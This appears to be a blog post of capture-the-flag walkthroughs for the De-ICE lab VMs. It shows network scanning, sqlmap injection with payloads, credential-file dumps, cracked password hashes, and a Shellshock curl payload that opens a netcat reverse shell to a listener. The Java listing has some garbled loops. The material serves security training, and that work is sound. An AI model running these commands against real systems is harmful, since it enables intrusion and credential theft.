1008,Atkins,Alison,double_a44@hotmail.com,NY,aatkins9087,gogogo123123,457094,124
1009,Oliver,Frank,fog_of_war0001@gmail.com,NY,foliver9385,falconpunch,783143,134
1010,Jones,Edith,msjones677@hotmail.com,NY,ejones7532,chris12345,632620,579
1011,Moore,Cody,aiprojectx@gmail.com,NY,dot_Cipher,crypTrace,101010,1337

That is the last flag, this challenge was personally tough because of all the Java code and encryption involved which aren’t in my normal day to day penetration tests.


 import java.io.*;
public class deice
{
    public static void main(String[] args)
    {
        try
        {
            System.out.println("[*] Password Generator");
            BufferedReader in=new BufferedReader(new InputStreamReader(System.in));
            System.out.print("[?] Username: ");
            String input=in.readLine();
            int[] output=processLoop(input);
            String outputASCII="";
            for(int i=0; i                outputASCII+=(char) output[i];
            System.out.println("[+] Password: " + outputASCII);
        }
        catch(IOException e)
        {
            System.out.println("[-] IO Error Occurred!");
        }
    }
/*input is username of account*/
    public static int[] processLoop(String input)
    {
        int strL = input.length();
        int lChar=(int)input.charAt(strL-1);
        int fChar=(int)input.charAt(0);        
        int[] encArr = new int[strL+2];        
        encArr[0]=(int)lChar;    
        for(int i=1;i            encArr[i]=(int)input.charAt(i-1);
        //encArr[0]=(int)lChar;
        encArr[encArr.length-1] = (int)fChar;
        encArr = backLoop(encArr);
        encArr = loopBack(encArr);
        encArr = loopProcess(encArr);
        int j = encArr.length-1;
        for(int i=0; i            if(i == j)
                break;
            int t=encArr[i];
            encArr[i]=encArr[j];
            encArr[j]=t;
            j--;
        }
    return encArr;
    }
/*Note the pseudocode will be implemented with the     
root account and my account, we still need to implement it with the csadmin, sdadmin,    
and dbadmin accounts though*/    
    public static int[] backLoop(int[] input){
        int ref = input.length;
        int a = input[1];
        int b = input[ref-1];
        int ch = (a+b)/2;        
        for(int i=0;i            if(i%2 == 0)
                input[i] = (input[i]%ch)+(ref+i);
            else
                input[i] = (input[i]+ref+i);
        }
    return input;
    }
    public static int[] loopProcess(int[] input){    
        for(int i=0; i i < input.length; i++ ) {
             if(input[i] == 40 || input[i] == 41)
                input[i] += input.length;
            else if(input[i] == 45)
                input[i] += 20+i;
        }
    return input;
    }
    public static int[] loopBack(int[] input){
        int ref = input.length/2;
        int[] encNew = new int[input.length+ref];
        int ch = 0;
        for(int i=(ref/2); i i < input.length; i++ ) {
             encNew[i] = input[ch];
            ch++;
        }
        for(int i=0; i            if(encNew[i] <= 33)
                encNew[i] = 33+(++ref*2);
            else if(encNew[i] >= 126)
                encNew[i]=126-(--ref*2);
            else{
                if(i%2 == 0)
                    encNew[i] -= (i%3);
                else
                    encNew[i] += (i%2);
            }
        }
    return encNew;
    }
}

I did not find this one from an old hard drive, the only thing I had was the link to the ISO and two empty text files. So this is basically a clean up to date walkthrough using Kali. This one was short and sweet, not to many flags to deal with. All of the spoilers are in the walkthrough as not to ruin the pen testing fun. Have fun and hopefully these are helpful.

SE-ICE S1.123

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.123.iso

Default IP: Hey, Look at flag one slacker

Flags:
1. Find default IP for system
2. Enumerate ports and services
3. Identify web and network vulnerabilities for system
4. Gain root access to system

Spoilers and Walkthrough

We have used a few different tools to find hosts on a subnet and we will add another one for this test. ARP (address resolution protocol) maps physical MAC addresses to the corresponding IP address for a network, because it isn’t routed it is useful for finding systems . There are multiple tools that use ARP for this discovery but I have chosen arp-scan because it is already installed in Kali and I knew the switch to use.

root@kali:~# arp-scan --localnet
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.1.1    00:50:56:c0:00:08    VMware, Inc.
192.168.1.2    00:50:56:e7:84:3f    VMware, Inc.
192.168.1.123    00:0c:29:1f:c6:f0    VMware, Inc.
192.168.1.254    00:50:56:e7:f4:91    VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.420 seconds (105.79 hosts/sec). 4 responded

Now that we know it is the .123 address lets port scan the image to get started. Once again, we will use the metasploit console to keep all of our into in one place.

msfconsole
workspace -a de-ice123
workspace de-ice123
db_nmap -T5 -A -p 0-65535 192.168.1.123

That is a lot to work with so lets narrow it down a bit and get started with some information gathering. Finger will expose user names and there is a simple scanner for it already built into metasploit.

use auxiliary/scanner/finger/finger_users
[*] 192.168.1.123:79      - 192.168.1.123:79 No users found.

That didn’t go as well as I had hoped. Lets look at a list of other open ports.

services
192.168.1.123  901    tcp    http         open   Samba SWAT administration server

Unfortunately, that is behind HTTP basic authentication and we don’t have any credentials to test yet. A little research shows that the by default it uses the root account and password for credentials. We can put that in the pile for a brute force attack later. Why am I showing you all of this stuff that doesn’t work? Because welcome to penetration testing. 99% of the things that you find, research, or try will be dead ends. That super sweet exploit the scanner found will either be a false positive or the local AV will eat the exploit and no amount of encryption and obfuscation will work. But, the research you do today about the finger service will pay off in three months when you run into it on another system.

Lets look at the Dokuwiki listening on port 80 and see if we can web app pen test this thing. I don’t want to copy all of the results here but I will paste the command and a few things that peaked my interest.

nikto -h 192.168.1.123
+ OSVDB-3268: /data/: Directory indexing found.
+ OSVDB-3092: /data/: This might be interesting...
+ OSVDB-3268: /lib/: Directory indexing found.
+ OSVDB-3092: /lib/: This might be interesting...
+ OSVDB-3092: /bin/: This might be interesting... possibly a system shell found.

I couldn’t validate the /bin system shell but one of you smart web app people will probably get that. Manually looking through those pages with a browser might give you an idea of a few things that we will do later on. Since we have already used Nmap we can check that one off the list. I will use the sqlmap next since we might be able to inject the ?id= parameter. Using the wizard isn’t 1337 H4x0r but it is an easy test so there is not a reason to use Burp to capture a request.

root@kali:~# sqlmap --wizard

[22:43:57] [INFO] starting wizard interface
Please enter full target URL (-u): http://192.168.1.123/doku.php?id=netcat
POST data (--data) [Enter for None]: 
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 3
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Intermediate
[3] All
> 3

No luck so if there is a SQL injection it is more obscure or needs some additional testing. Since the wiki talks about netcat lets see if that is a hint. There are two interesting ports based off numbering to look at 1337 and 31337. As a penetration tester DON’T DO THIS. Don’t try to be clever and show you are an elite hacker, also change the default port on your meterpreter shells. Be professional, 4444 and 1337 raise a lot of red flags on an IDS that 8080 and 8443 won’t. For readability I’ve bolded my command inputs.

root@kali:~# nc -vv 192.168.1.123 1337
192.168.1.123: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.1.123] 1337 (?) open
id
uid=0(root) gid=0(root)
cd ..
ls
bin
dev
etc
home
lib
mnt
opt
proc
root
sbin
sys
tmp
usr
var
cd ..pwd
/
cd etccat shadow
root:$1$3OF/pWTC$lvhdyl86pAEQcrvepWqpu.:13553:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
cat passwd
root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:

Lets validate that we have SSH access after reversing that hash. You already reversed that hash with John right?

msf auxiliary(ssh_login) > run

[*] SSH - Starting bruteforce
[+] SSH - Success: 'root:toor' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 pentium2 i386 GNU/Linux '
[*] Command shell session 1 opened (192.168.1.128:36105 -> 192.168.1.123:22) at 2017-04-13 23:34:37 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions -i 1
[*] Starting interaction with 1...

We are root on the system through a netcat shell. On a real penetration test this would be a bad finding, this is where you actually stop testing and call your contact to tell they someone else has compromised their systems. Could it be a really bad system administrator who decided that adding a wildly unsecured access method was a good idea? Yes. Could it be a malicious attack? Yes. In this case you would grab a screenshot for your report and send up a flare to your client. Who knows, maybe you will get extra billable hours to clean it off.

I dug around on the rest of the system looking for other flags but didn’t find any data to manipulate. Based on the age of the PHP and Apache install there are probably lots of vulnerabilities that can be exploited on this system.

While digging though an old external drive I found the De-ICE LiveCD’s and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.

Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are in the walkthrough as not to ruin the pen testing fun. Have fun and hopefully these are helpful.

SE-ICE S1.120

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.120.iso

Default IP 192.168.1.120

Flags:
1. Create list of open ports
2. This is primarily a web penetration test act accordingly
3. Obtain access to file system
4. Log in using brute force password
5. Perform post exploitation
6. FINAL FLAG: Rummage about in the file system

Spoilers and Walkthrough

Port scan the image to get started.

root@SNM-KScan-2:~# nmap -sV -T4 192.168.1.120

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-07 13:53 MST
Nmap scan report for 192.168.1.120
Host is up (0.00047s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD 1.3.2
22/tcp   open  ssh      OpenSSH 5.1 (protocol 2.0)
80/tcp   open  http     Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
443/tcp  open  ssl/http Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:A4:37:1E (VMware)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.37 seconds

This is primarily a vulnerable web app so I started working with html injection on the http://192.168.1.120/add_product.php page
<h1>htmlinjection</h1>
<h1>htmlinjection1</h1>
<h1>htmlinjection2</h1>
Normally if you can get html injection it is possible to get XSS if you can bypass whatever filter is in place. I only use the number to keep track of which injection actually worked. I used burp to capture the request. Then saved it and loaded it into SQL map. the -r is what I named the file and -p is the name of the parameter to attack.

sqlmap -r /root/Desktop/deice/120webrequest -p price

No joy so lets hit it a little harder

sqlmap -r /root/Desktop/deice/120webrequest -p price --level=5 --risk=3

Nope lets try the other parameters

sqlmap -r /root/Desktop/deice/120webrequest -p product --level=5 --risk=3
sqlmap -r /root/Desktop/deice/120webrequest -p description --level=5 --risk=3

I might have busted it but there is another parameter here you can test. Feed the id parameter to sqlmap using the –wizard option http://192.168.1.120/products.php?id=1

sqlmap -r /root/Desktop/deice/120webrequest2 --level=5 --risk=3

root@SNM-KScan-2:~# sqlmap -r /root/Desktop/deice/120webrequest2 --level=5 --risk=3

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:43:07

[14:43:07] [INFO] parsing HTTP request from '/root/Desktop/deice/120webrequest2'
[14:43:07] [INFO] testing connection to the target URL
[14:43:07] [INFO] testing if the target URL is stable. This can take a couple of seconds
[14:43:08] [INFO] target URL is stable
[14:43:08] [INFO] testing if GET parameter 'id' is dynamic
[14:43:08] [INFO] confirming that GET parameter 'id' is dynamic
[14:43:08] [INFO] GET parameter 'id' is dynamic
[14:43:09] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
[14:43:09] [INFO] testing for SQL injection on GET parameter 'id'
[14:43:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:43:10] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable

BOOM goes the dynamite! and now we wait while sqlmap handles its business. If you don’t want to mess with Burp the same command is:

sqlmap --banner --dbms=mysql -u "http://192.168.1.120/products.php?id=1"

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:05:47

[09:05:47] [INFO] testing connection to the target URL
[09:05:47] [INFO] testing if the target URL is stable. This can take a couple of seconds
[09:05:48] [INFO] target URL is stable
[09:05:48] [INFO] testing if GET parameter 'id' is dynamic
[09:05:49] [INFO] confirming that GET parameter 'id' is dynamic
[09:05:49] [INFO] GET parameter 'id' is dynamic
[09:05:49] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
[09:05:49] [INFO] testing for SQL injection on GET parameter 'id'
[09:05:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:05:49] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[09:05:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[09:05:49] [INFO] testing 'MySQL inline queries'
[09:05:49] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:05:49] [WARNING] time-based comparison requires larger statistical model, please wait..................                                          
[09:05:50] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:06:00] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable 
[09:06:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[09:06:00] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:06:00] [WARNING] reflective value(s) found and filtering out
[09:06:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 71 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1082=1082

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[09:06:14] [INFO] the back-end DBMS is MySQL
[09:06:14] [INFO] fetching banner
[09:06:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:06:14] [INFO] retrieved: 5.1.33
web application technology: Apache 2.2.11, PHP 5.2.9
back-end DBMS: MySQL 5.0.11
banner:    '5.1.33'
[09:06:16] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/192.168.1.120'

[*] shutting down at 09:06:16

It is time to get down on the database.

sqlmap --dbms=mysql -u "http://192.168.1.120/products.php?id=1" --users --passwords -o --threads=8 --time-sec=1

****Partial output This takes awhile****
database management system users [50]:
[*] 'aadams'@'localhost'
[*] 'aallen'@'localhost'
[*] 'aard'@'localhost'
[*] 'aharp'@'localhost'
[*] 'aheflin'@'localhost'
[*] 'amaynard'@'localhost'
[*] 'aspears'@'localhost'
[*] 'aweiland'@'localhost'
[*] 'bbanter'@'localhost'
[*] 'bphillips'@'localhost'
[*] 'bwatkins'@'localhost'
[*] 'cchisholm'@'localhost'
[*] 'ccoffee'@'localhost'
[*] 'dcooper'@'localhost'
[*] 'dgilfillan'@'localhost'
[*] 'dgrant'@'localhost'
[*] 'djohnson'@'localhost'
[*] 'dstevens'@'localhost'
[*] 'dtraylor'@'localhost'
[*] 'dwestling'@'localhost'
[*] 'hlovell'@'localhost'
[*] 'jalcantar'@'localhost'
[*] 'jalvarez'@'localhost'
[*] 'jayala'@'localhost'
[*] 'jbresnahan'@'localhost'
[*] 'jdavenport'@'localhost'
[*] 'jduff'@'localhost'
[*] 'jfranklin'@'localhost'
[*] 'kclemons'@'localhost'
[*] 'krenfro'@'localhost'
[*] 'ktso'@'localhost'
[*] 'kwebber'@'localhost'
[*] 'lmartinez'@'localhost'
[*] 'lmorales'@'localhost'
[*] 'mbryan'@'localhost'
[*] 'mholland'@'localhost'
[*] 'mnader'@'localhost'
[*] 'mrodriguez'@'localhost'
[*] 'myajima'@'localhost'
[*] 'qpowers'@'localhost'
[*] 'rdominguez'@'localhost'
[*] 'rjacobson'@'localhost'
[*] 'rpatel'@'localhost'
[*] 'sgains'@'localhost'
[*] 'sjohnson'@'localhost'
[*] 'strammel'@'localhost'
[*] 'swarren'@'localhost'
[*] 'tdeleon'@'localhost'
[*] 'tgoodchap'@'localhost'
[*] 'webapp'@'localhost'

When it retrieves the password hashes. You will get prompted to let sqlmap crack them automatically.
Just note that there are so many user names and passwords that the next couple pages are a mass spoiler.

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[09:47:24] [INFO] writing hashes to a temporary file '/tmp/sqlmaphashes-XtKh9b.txt' 
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[09:47:39] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 2
what's the custom dictionary's location?
> /usr/share/wordlists/rockyou.txt
[09:48:22] [INFO] using custom dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[*] aadams [1]:
    password hash: *F491287896471CB21030790BF46865C4A39DE651
    clear-text password: batman
[*] aallen [1]:
    password hash: *AE9F960F8FA0994C9878D2245DA640EAFF09BA0E
    clear-text password: superman
[*] aard [1]:
    password hash: *7FD9F123C9FC025372A5AAD19D107783CD19CCF7
    clear-text password: cheese
[*] aharp [1]:
    password hash: *44FFB04331ADAECB1FAB104F634E9B066BF8C6DC
    clear-text password: pokemon
[*] aheflin [1]:
    password hash: *90837F291B744BBE86DF95A37D2B2524185DBBF5
    clear-text password: whatever
[*] amaynard [1]:
    password hash: *4DC6D98E4CF6200B9F5529AFDE2E3B909F41E4D0
    clear-text password: kotaku
[*] aspears [1]:
    password hash: *CFBF459D9D6057BC2A85477A38327B96F06B1597
    clear-text password: iloveyou
[*] aweiland [1]:
    password hash: *B2B366CA5C4697F31D4C55D61F0B17E70E5664EC
    clear-text password: 666666
[*] bbanter [1]:
    password hash: *ED043A01F4583450BC8EB1E83C00C372CA49C4E4
    clear-text password: michelle
[*] bphillips [1]:
    password hash: *E56A114692FE0DE073F9A1DD68A00EEB9703F3F1
    clear-text password: 123123
[*] bwatkins [1]:
    password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
    clear-text password: 123456
[*] cchisholm [1]:
    password hash: *51AA306E66303073DBA15D2750E23C90C7A7F947
    clear-text password: baseball
[*] ccoffee [1]:
    password hash: *B12289EEF8752AD620294A64A37CD586223AB454
    clear-text password: 0
[*] dcooper [1]:
    password hash: *D6B63C1953E7F096DB307F8AC48C4AD703E57001
    clear-text password: sunshine
[*] dgilfillan [1]:
    password hash: *24B8599BAF46DD4B4D8DB50A3B10136457492622
    clear-text password: starwars
[*] dgrant [1]:
    password hash: *D37C49F9CBEFBF8B6F4B165AC703AA271E079004
    clear-text password: letmein
[*] djohnson [1]:
    password hash: *C5FEAC8A32D4FAFF1EF681447DA706634352AFF8
    clear-text password: killer
[*] dstevens [1]:
    password hash: *797420C584EBF42750EB523104268BA0FD87FBC8
    clear-text password: internet
[*] dtraylor [1]:
    password hash: *79BF466BCC601BD91A0897BB162421F9BA8C29CA
[*] dwestling [1]:
    password hash: *7B2F14D9BB629E334CD49A1028BD85750F7D3530
    clear-text password: shadow
[*] hlovell [1]:
    password hash: *3B477BC23EA39BFF66D64BFB68DB5EC5F5E31C91
    clear-text password: consumer
[*] jalcantar [1]:
    password hash: *46CFC7938B60837F46B610A2D10C248874555C14
    clear-text password: trustno1
[*] jalvarez [1]:
    password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
    clear-text password: password
[*] jayala [1]:
    password hash: *6691484EA6B50DDDE1926A220DA01FA9E575C18A
    clear-text password: abc123
[*] jbresnahan [1]:
    password hash: *446525BB82B5E22BD9E525261D37C494F623C52B
    clear-text password: blahblah
[*] jdavenport [1]:
    password hash: *61305383748FBEAB119F9A8BC35EBBADB4889A9D
[*] jduff [1]:
    password hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A
    clear-text password: princess
[*] jfranklin [1]:
    password hash: *2A032F7C5BA932872F0F045E0CF6B53CF702F2C5
    clear-text password: 654321
[*] kclemons [1]:
    password hash: *74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3
    clear-text password: passw0rd
[*] krenfro [1]:
    password hash: *8D6A637F37955DBFCE1229204DDBED1CE11E6F41
    clear-text password: master
[*] ktso [1]:
    password hash: *A4B6157319038724E3560894F7F932C8886EBFCF
    clear-text password: 1234
[*] kwebber [1]:
    password hash: *F8E113FD51D520075836A4B815568BA2B96F7C30
    clear-text password: dragon
[*] lmartinez [1]:
    password hash: *626AC8265C7D53693CB7478376CE1B4825DFF286
    clear-text password: pepper
[*] lmorales [1]:
    password hash: *FCAAF3F0BD94C027B2769A95903C355CE6294660
    clear-text password: football
[*] mbryan [1]:
    password hash: *B021918A5DCA54916CF724573179571DFC37AC88
    clear-text password: jennifer
[*] mholland [1]:
    password hash: *A7D31514D37A55CE91C6C5DF97299CBC1B1937EC
    clear-text password: jordan
[*] mnader [1]:
    password hash: *DF216F57F1F2066124E1AA5491D995C3CB57E4C2
    clear-text password: welcome
[*] mrodriguez [1]:
    password hash: *AA1420F182E88B9E5F874F6FBE7459291E8F4601
    clear-text password: qwerty
[*] myajima [1]:
    password hash: *3EEB06BE54EABF909DC8F6107110777F1DE43186
[*] qpowers [1]:
    password hash: *DB1B792EC6DAE393BAE7AD832D3AF207C12E9A00
    clear-text password: michael
[*] rdominguez [1]:
    password hash: *00A51F3F48415C7D4E8908980D443C29C69B60C9
    clear-text password: 12345
[*] rjacobson [1]:
    password hash: *FD571203974BA9AFE270FE62151AE967ECA5E0AA
    clear-text password: 111111
[*] rpatel [1]:
    password hash: *6A7A490FB9DC8C33C2B025A91737077A7E9CC5E5
    clear-text password: 1234567
[*] sgains [1]:
    password hash: *81101DED975D54BD76A3C8EAD293597AE9BB143F
    clear-text password: computer
[*] sjohnson [1]:
    password hash: *84AAC12F54AB666ECFC2A83C676908C8BBC381B1
    clear-text password: 12345678
[*] strammel [1]:
    password hash: *A5892368AE83685440A1E27D012306B073BDF5B7
    clear-text password: monkey
[*] swarren [1]:
    password hash: *FBA7C2D27C9D05F3FD4C469A1BBAF557114E5594
    clear-text password: Password
[*] tdeleon [1]:
    password hash: *94F3DC3F398B76269CAAD51627279D4233A6C89A
    clear-text password: soccer
[*] tgoodchap [1]:
    password hash: *22AC3D548EB2C2A2F4E609ADA63251D0AF795AD9
    clear-text password: nintendo
[*] webapp [1]:
    password hash: *0DCC22A95EEBFF4984DF6A7B7F2D7D28DBB5F36F

We know that we have SQL injection but lets hit it with nikto also. This thing is a wreck.

root@SNM-KScan-2:~# nikto -h 192.168.1.120
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.120
+ Target Hostname:    192.168.1.120
+ Target Port:        80
+ Start Time:         2015-01-08 09:21:21 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
+ Retrieved x-powered-by header: PHP/5.2.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ mod_apreq2-20051231/2.6.0 appears to be outdated (current is at least 2.6.1)
+ mod_perl/2.0.4 appears to be outdated (current is at least 2.0.7)
+ Apache/2.2.11 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.2.11 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.2.9 appears to be outdated (current is at least 5.4.26)
+ Perl/v5.10.0 appears to be outdated (current is at least v5.14.2)
+ OpenSSL/0.9.8k appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 8429, size: 30894, mtime: Fri May 11 06:40:36 2007
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ OSVDB-3268: /webalizer/: Directory indexing found.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /cgi-bin/printenv: Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. http://www.securityfocus.com/bid/4431.
+ OSVDB-3233: /cgi-bin/test-cgi: Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7354 requests: 0 error(s) and 25 item(s) reported on remote host
+ End Time:           2015-01-08 09:22:12 (GMT-7) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

So I’m not giving up on Shellshock.

curl -k -H 'User-Agent: () { :;}; /bin/bash -c "nc -e /bin/bash 192.168.1.130 5005"'  http://192.168.1.120/cgi-bin/printenv.cgi

Nope no joy. Lets try some metasploit attacks. Port 631 was listening and we have usernames and password.

use exploit/multi/http/cups_bash_env_exec

Even less joy. Sigh…lets just try the reversed passwords for the accounts. Our old friends ccoffee, bbanter and aadams are all there.

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting                Required  Description
   ----              ---------------                --------  -----------
   BLANK_PASSWORDS   false                          no        Try blank passwords for all users
   BRUTEFORCE_SPEED  3                              yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                          no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                          no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                          no        Add all users in the current database to the list
   PASSWORD                                         no        A specific password to authenticate with
   PASS_FILE                                        no        File containing passwords, one per line
   RHOSTS            192.168.1.120                  yes       The target address range or CIDR identifier
   RPORT             22                             yes       The target port
   STOP_ON_SUCCESS   false                          yes       Stop guessing when a credential works for a host
   THREADS           1                              yes       The number of concurrent threads
   USERNAME                                         no        A specific username to authenticate as
   USERPASS_FILE     /root/Desktop/deice/users.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                          no        Try the username as the password for all users
   USER_FILE                                        no        File containing usernames, one per line
   VERBOSE           true                           yes       Whether to print output for all attempts


msf auxiliary(ssh_login) > run

[*] 192.168.1.120:22 SSH - Starting bruteforce
